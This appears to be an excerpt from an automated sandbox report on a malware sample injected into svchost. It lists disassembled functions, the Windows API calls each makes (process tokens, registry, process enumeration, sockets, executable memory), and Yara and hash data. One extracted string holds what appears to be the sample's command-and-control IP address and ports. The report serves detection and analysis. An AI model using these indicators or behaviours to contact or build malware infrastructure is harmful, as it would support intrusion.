                                                                                                              • Opcode Fuzzy Hash: e4d1ea22d592ffed3be516574fc06584b81183932947d7a8808cdff2476c178c
                                                                                                              • Instruction Fuzzy Hash: F741D3B5A00114AFDB10EFA4DC84E9FBBB8EF44704F058059EE099B355EA74BA00CBE1
                                                                                                              Function 04DF6960 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcessId.KERNEL32(E179827C,00000000,00000000,75A773E0,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF6988
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF6997
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF69B0
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,04E1213B,000000FF,?,04DF6B03,00000000), ref: 04DF69BB
                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 04DF6A0E
                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 04DF6A1C
                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,00000000,04E1213B,000000FF), ref: 04DF6A7E
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,04E1213B,000000FF), ref: 04DF6A84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 429299433-0
                                                                                                              • Opcode ID: eb633ca7166c5b22006ee0ce09b73feb3dc35fcd7afb8f172b03a58286b7ed0c
                                                                                                              • Instruction ID: 1ceaddf66c5fc6a28a8e4731225b1b2ab97d727f359ab40789d37dead0a55ed6
                                                                                                              • Opcode Fuzzy Hash: eb633ca7166c5b22006ee0ce09b73feb3dc35fcd7afb8f172b03a58286b7ed0c
                                                                                                              • Instruction Fuzzy Hash: 3941D7B2E801149FDB20DFA9DC40AAEFBF8FB44714F158615EA15E7640E735AD01CBA0
                                                                                                              Function 04DF6DC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF6E29
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,04E16164,00000000,00020019,75A773E0), ref: 04DF6E4C
                                                                                                              • RegQueryValueExW.KERNELBASE(75A773E0,GROUP,00000000,00000001,?,00000208), ref: 04DF6E9A
                                                                                                              • lstrcmpW.KERNEL32(?,04E16148), ref: 04DF6EB0
                                                                                                              • lstrcpyW.KERNEL32(04DF56EA,?), ref: 04DF6EC2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                              • String ID: GROUP
                                                                                                              • API String ID: 2102619503-2593425013
                                                                                                              • Opcode ID: 10a224c48229fb4e8730d1eee8b51401a6655a08fe5af7a9b18082e06a37cf79
                                                                                                              • Instruction ID: 5f619e6c930eba6624faed14d707c1915a3d3bf752b7359aabbcc4f50af3ce6a
                                                                                                              • Opcode Fuzzy Hash: 10a224c48229fb4e8730d1eee8b51401a6655a08fe5af7a9b18082e06a37cf79
                                                                                                              • Instruction Fuzzy Hash: 4931B871A40318ABDB30DF90DC4DB9EB7B8FB08710F104299E519A7190DB74EA45CF50
                                                                                                              Function 025872FB Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 02587320
                                                                                                              • __calloc_crt.LIBCMT ref: 0258732C
                                                                                                              • __getptd.LIBCMT ref: 02587339
                                                                                                              • CreateThread.KERNELBASE(?,?,02587296,00000000,?,?), ref: 02587370
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0258737A
                                                                                                              • _free.LIBCMT ref: 02587383
                                                                                                              • __dosmaperr.LIBCMT ref: 0258738E
                                                                                                                • Part of subcall function 025871ED: __getptd_noexit.LIBCMT ref: 025871ED
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 155776804-0
                                                                                                              • Opcode ID: 3e5cf604f6306b85e5ebdf852ae04c814d21e5f85e7a925d5074363f12ddc35b
                                                                                                              • Instruction ID: 500c0b7bfb7d1b1026b95074f547afb7e44f060da009755e81dcea862698a096
                                                                                                              • Opcode Fuzzy Hash: 3e5cf604f6306b85e5ebdf852ae04c814d21e5f85e7a925d5074363f12ddc35b
                                                                                                              • Instruction Fuzzy Hash: 1D11E936154307AFDB11BFA5DC40E6B7B99FF89774B200419F915A6140DFF1D4108AAD
                                                                                                              Function 04DFFA79 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 04DFFA9E
                                                                                                              • __calloc_crt.LIBCMT ref: 04DFFAAA
                                                                                                              • __getptd.LIBCMT ref: 04DFFAB7
                                                                                                              • CreateThread.KERNELBASE(?,?,04DFFA14,00000000,?,?), ref: 04DFFAEE
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 04DFFAF8
                                                                                                              • _free.LIBCMT ref: 04DFFB01
                                                                                                              • __dosmaperr.LIBCMT ref: 04DFFB0C
                                                                                                                • Part of subcall function 04DFF96B: __getptd_noexit.LIBCMT ref: 04DFF96B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 155776804-0
                                                                                                              • Opcode ID: 0b8685689e52ca5bb550ece2ae510098eeeed5a30460f6740204c7c03d2d36fb
                                                                                                              • Instruction ID: 6943d60492ed845d55a576b42a8f3034d3fe8a00b5fd683025cb2094a2116cb2
                                                                                                              • Opcode Fuzzy Hash: 0b8685689e52ca5bb550ece2ae510098eeeed5a30460f6740204c7c03d2d36fb
                                                                                                              • Instruction Fuzzy Hash: 4211A5322047067FEB31AFA5AC80D9F3798EF05768B12412EFE1496191EB71F8418A70
                                                                                                              Function 04DF7460 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF748D
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04DF7494
                                                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF74A2
                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,04DF7573), ref: 04DF74AA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                              • API String ID: 3433367815-192647395
                                                                                                              • Opcode ID: ceb737b967f77e76da760bfb57e624dbc2958f9ebc3418541fa502ae4cb55ad2
                                                                                                              • Instruction ID: 27e8cb30b9f98d06c38cd9f6d9d95f0795e0119432d7c24da74607aed767de44
                                                                                                              • Opcode Fuzzy Hash: ceb737b967f77e76da760bfb57e624dbc2958f9ebc3418541fa502ae4cb55ad2
                                                                                                              • Instruction Fuzzy Hash: 6601E874E402099FDB50DFB999446EEBBF5EB08301F504669D909E3244EA3AAA40CF61
                                                                                                              Function 02587296 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0258729C
                                                                                                                • Part of subcall function 025897C0: TlsGetValue.KERNEL32(00000000,02589919,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000), ref: 025897C9
                                                                                                                • Part of subcall function 025897C0: DecodePointer.KERNEL32(?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26,0000000D), ref: 025897DB
                                                                                                                • Part of subcall function 025897C0: TlsSetValue.KERNEL32(00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000,00000000,?,02589A26), ref: 025897EA
                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 025872A7
                                                                                                                • Part of subcall function 025897A0: TlsGetValue.KERNEL32(?,?,025872AC,00000000), ref: 025897AE
                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 025872BA
                                                                                                                • Part of subcall function 025897F4: DecodePointer.KERNEL32(?,?,?,025872BF,00000000,?,00000000), ref: 02589805
                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 025872C3
                                                                                                              • ExitThread.KERNEL32 ref: 025872CA
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 025872D0
                                                                                                              • __freefls@4.LIBCMT ref: 025872F0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2383549826-0
                                                                                                              • Opcode ID: ad03bac6dd2dba25e95c0c1eed99e7670361269600238f2225b782b01771fc2f
                                                                                                              • Instruction ID: 1773c1fd6844705cf9efa6d385b618c7d2fe770742c84b5eccef26191d10ed89
                                                                                                              • Opcode Fuzzy Hash: ad03bac6dd2dba25e95c0c1eed99e7670361269600238f2225b782b01771fc2f
                                                                                                              • Instruction Fuzzy Hash: AFF06274400646ABC704BF71C44892E7FAABFCA3003218854E906E7311EB74D406DE99
                                                                                                              Function 04DFFA14 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 04DFFA1A
                                                                                                                • Part of subcall function 04E03CF0: TlsGetValue.KERNEL32(00000000,04E03E49,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000), ref: 04E03CF9
                                                                                                                • Part of subcall function 04E03CF0: DecodePointer.KERNEL32(?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000,?,04E03F56,0000000D), ref: 04E03D0B
                                                                                                                • Part of subcall function 04E03CF0: TlsSetValue.KERNEL32(00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6,00000000,00000000,?,04E03F56), ref: 04E03D1A
                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 04DFFA25
                                                                                                                • Part of subcall function 04E03CD0: TlsGetValue.KERNEL32(?,?,04DFFA2A,00000000), ref: 04E03CDE
                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 04DFFA38
                                                                                                                • Part of subcall function 04E03D24: DecodePointer.KERNEL32(?,?,?,04DFFA3D,00000000,?,00000000), ref: 04E03D35
                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 04DFFA41
                                                                                                              • ExitThread.KERNEL32 ref: 04DFFA48
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 04DFFA4E
                                                                                                              • __freefls@4.LIBCMT ref: 04DFFA6E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                              • String ID:
                                                                                                              • API String ID: 2383549826-0
                                                                                                              • Opcode ID: 915ae9b596e2e4c4b53662a3c78fdc799d851fb8a8907fe10d16e2dfb10fa6e5
                                                                                                              • Instruction ID: 3c5703eba9a4291909ae14a9e573466201f6d1d6f7a3f81a8f89cc6e133bb20b
                                                                                                              • Opcode Fuzzy Hash: 915ae9b596e2e4c4b53662a3c78fdc799d851fb8a8907fe10d16e2dfb10fa6e5
                                                                                                              • Instruction Fuzzy Hash: 01F09074600600AFE714BF72CA48C0EBBA8FF48209711C199ED59E7265DA34F882CBA1
                                                                                                              Function 04DF60A0 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 04DF60CC
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04DF60D8
                                                                                                              • Process32FirstW.KERNEL32(00000000,00000000), ref: 04DF6109
                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04DF615F
                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,00000000), ref: 04DF6166
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2526126748-0
                                                                                                              • Opcode ID: 8e0cf4449288cdef0568499f8ccbbd61d6898ff61ccbd131dd638ef84550bf5c
                                                                                                              • Instruction ID: 1715d8ec46ea62435f9360ab7b13cd151c104d1cc013f17b3a9902c4305aa4be
                                                                                                              • Opcode Fuzzy Hash: 8e0cf4449288cdef0568499f8ccbbd61d6898ff61ccbd131dd638ef84550bf5c
                                                                                                              • Instruction Fuzzy Hash: 9221F3317001149BEB30EF74EC45BEAB3A8FF08325F0142A9DE1987181EB35EA01C650
                                                                                                              Function 025832D0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025832E1
                                                                                                              • Sleep.KERNELBASE(00000258), ref: 025832EE
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 025832F6
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02583302
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0258330A
                                                                                                              • Sleep.KERNELBASE(0000012C), ref: 0258331B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 3137405945-0
                                                                                                              • Opcode ID: 6b6070056bea72206e92eacf68510b95ab357fede238eb396845accacf7f8511
                                                                                                              • Instruction ID: 4f5215b873f409c51aa8b11e009a392f2526f27d0a59a1a3ab468196fb5439ad
                                                                                                              • Opcode Fuzzy Hash: 6b6070056bea72206e92eacf68510b95ab357fede238eb396845accacf7f8511
                                                                                                              • Instruction Fuzzy Hash: AFF082722443046BD610EBA9DC84E56F3A8EF85330B214B09F321872D0CAB0E8158BA4
                                                                                                              Function 02586FF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 02587011
                                                                                                                • Part of subcall function 02586F63: __FF_MSGBANNER.LIBCMT ref: 02586F7C
                                                                                                                • Part of subcall function 02586F63: __NMSG_WRITE.LIBCMT ref: 02586F83
                                                                                                                • Part of subcall function 02586F63: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586FA8
                                                                                                              • std::exception::exception.LIBCMT ref: 02587046
                                                                                                              • std::exception::exception.LIBCMT ref: 02587060
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 02587071
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                              • String ID: bad allocation
                                                                                                              • API String ID: 615853336-2104205924
                                                                                                              • Opcode ID: cfa80d5a1b74b64ace04ab6141d1973999d421a1c89d4ed1e4b746bc33d60b73
                                                                                                              • Instruction ID: 92d432745b104bbea5291aad9a05cbd053bab21d94a42244457fedaf1e4248d0
                                                                                                              • Opcode Fuzzy Hash: cfa80d5a1b74b64ace04ab6141d1973999d421a1c89d4ed1e4b746bc33d60b73
                                                                                                              • Instruction Fuzzy Hash: EBF0CD3590010AEADF05FF55DC009ADBFABBB85714F240415E405B6090EBF1C654CF6D
                                                                                                              Function 04DFF757 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 04DFF771
                                                                                                                • Part of subcall function 04DFF6C3: __FF_MSGBANNER.LIBCMT ref: 04DFF6DC
                                                                                                                • Part of subcall function 04DFF6C3: __NMSG_WRITE.LIBCMT ref: 04DFF6E3
                                                                                                                • Part of subcall function 04DFF6C3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04DFF708
                                                                                                              • std::exception::exception.LIBCMT ref: 04DFF7A6
                                                                                                              • std::exception::exception.LIBCMT ref: 04DFF7C0
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 04DFF7D1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                              • String ID: bad allocation
                                                                                                              • API String ID: 615853336-2104205924
                                                                                                              • Opcode ID: a362243f0c796016f2fcb48707056142099d819b3c45017bf36cc4ca4145c03d
                                                                                                              • Instruction ID: c8d4312e2362fbd076c0b49ab10f2438332258bf8a1acef3845c92a1dad38068
                                                                                                              • Opcode Fuzzy Hash: a362243f0c796016f2fcb48707056142099d819b3c45017bf36cc4ca4145c03d
                                                                                                              • Instruction Fuzzy Hash: D8F0F471A40609ABEB24EF15DD25E6EBAA5EF00758F11000EEA14E60E0DB70FA00CB94
                                                                                                              Function 02586420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32stringsynchronizationthreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?), ref: 02586431
                                                                                                                • Part of subcall function 02585E30: _memset.LIBCMT ref: 02585E61
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,02586110,00000000,00000000,00000000), ref: 0258645E
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0258646C
                                                                                                              • CloseHandle.KERNEL32(?), ref: 02586479
                                                                                                              Strings
                                                                                                              • |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 0258643D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleObjectSingleThreadWait_memsetlstrlen
                                                                                                              • String ID: |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                                                                                              • API String ID: 1730619010-42098077
                                                                                                              • Opcode ID: 0a3bcff8555b5bbe16dcf31f7ee8555aba4cc18321ae21690e9bcb6d44e47a14
                                                                                                              • Instruction ID: 0bf2c25a1a37e58797fc9a2ab5e867ccb7d85412793ac0bf704f47e6fb3fe825
                                                                                                              • Opcode Fuzzy Hash: 0a3bcff8555b5bbe16dcf31f7ee8555aba4cc18321ae21690e9bcb6d44e47a14
                                                                                                              • Instruction Fuzzy Hash: 93F08931982214BFDB107F90ED0AF65376CBB05B11F510910F309651C1D7B4602497AC
                                                                                                              Function 02582D00 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02582D2C
                                                                                                              • CancelIo.KERNEL32(?), ref: 02582D36
                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02582D3F
                                                                                                              • closesocket.WS2_32(?), ref: 02582D49
                                                                                                              • SetEvent.KERNEL32(00000001), ref: 02582D53
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                              • String ID:
                                                                                                              • API String ID: 1486965892-0
                                                                                                              • Opcode ID: f067bc014acb50d6e823631edce8cf0b82befa1178fbd086b5b98ab8d5976a6e
                                                                                                              • Instruction ID: 7abedc5de6336486a46c4b3e0d4485cfbd0b196e6d5b457faa67b328d0cb622b
                                                                                                              • Opcode Fuzzy Hash: f067bc014acb50d6e823631edce8cf0b82befa1178fbd086b5b98ab8d5976a6e
                                                                                                              • Instruction Fuzzy Hash: C5F0AF76541700ABC330DF54DC09F6677B8FB48B11F504A19F68293680D7B0B428DBE4
                                                                                                              Function 04DF2D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 04DF2D5C
                                                                                                              • CancelIo.KERNEL32(?), ref: 04DF2D66
                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 04DF2D6F
                                                                                                              • closesocket.WS2_32(?), ref: 04DF2D79
                                                                                                              • SetEvent.KERNEL32(00000001), ref: 04DF2D83
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                              • String ID:
                                                                                                              • API String ID: 1486965892-0
                                                                                                              • Opcode ID: 0807901103cbf8650813d55275efdfb410544a23c6638cbf42276fcb9d267cb7
                                                                                                              • Instruction ID: 4719f8f982bac8294d6396b7b24f6ee83811fc7cc06d34bf952a87dc008852fe
                                                                                                              • Opcode Fuzzy Hash: 0807901103cbf8650813d55275efdfb410544a23c6638cbf42276fcb9d267cb7
                                                                                                              • Instruction Fuzzy Hash: 40F08175240300ABD2309F55DD09B66B3B8FB48B12F10061CFA9292694CAB4B9048B90
                                                                                                              Function 02A001D9 Relevance: 4.8, APIs: 3, Instructions: 267memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02A00239
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                              • Instruction ID: 01d276f8ea21cc1feeb37fce51679756bf48106b2eb0bf26f51472b818954dd2
                                                                                                              • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                              • Instruction Fuzzy Hash: ACA14770A00606AFDB15CFA9D8C0BAEB7B5FF48318F1480A9E515E7391DB70EA51CB94
                                                                                                              Function 02583130 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0258313B
                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02583153
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 025831FF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
